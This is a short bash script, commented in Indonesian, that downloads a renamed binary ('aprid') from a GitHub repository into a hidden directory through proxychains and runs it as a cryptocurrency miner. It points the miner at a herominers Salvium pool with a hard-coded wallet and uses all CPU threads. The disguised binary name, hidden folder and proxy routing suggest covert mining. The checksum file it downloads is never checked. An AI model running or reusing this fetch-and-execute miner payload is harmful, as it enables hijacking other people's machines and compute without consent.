#!/bin/bash

# Buat direktori .kap dan masuk ke dalamnya
mkdir -p ~/.kap && cd ~/.kap

# Fungsi wget dengan retry dan proxychains
download_with_retry() {
    proxychains wget --tries=10 \
      --retry-connrefused \
      --timeout=30 \
      --waitretry=15 \
      -O "$1" "$2"
}

# Unduh aprid dan SHA256SUMS menggunakan proxychains dengan retry
download_with_retry "aprid" "https://github.com/Dewinet/your/raw/refs/heads/main/aprid"
download_with_retry "SHA256SUMS" "https://github.com/Dewinet/your/raw/refs/heads/main/SHA256SUMS"

# Beri izin eksekusi ke aprid
chmod 777 aprid

# Jalankan mining dengan proxychains
proxychains ./aprid --donate-level 1 \
    -o sg.salvium.herominers.com:1230 \
    -u SaLvdUj9vebTXP3ADtxozYLfwaBjG651pcKoy5kjD3FTEnZA3wT2fZNPxtJTWCwruX1QuKUxZKAdeAYiLumbJEcGK4XFc9wbP1w \
    -p EMPUY -a rx/0 -k -t $(nproc --all)
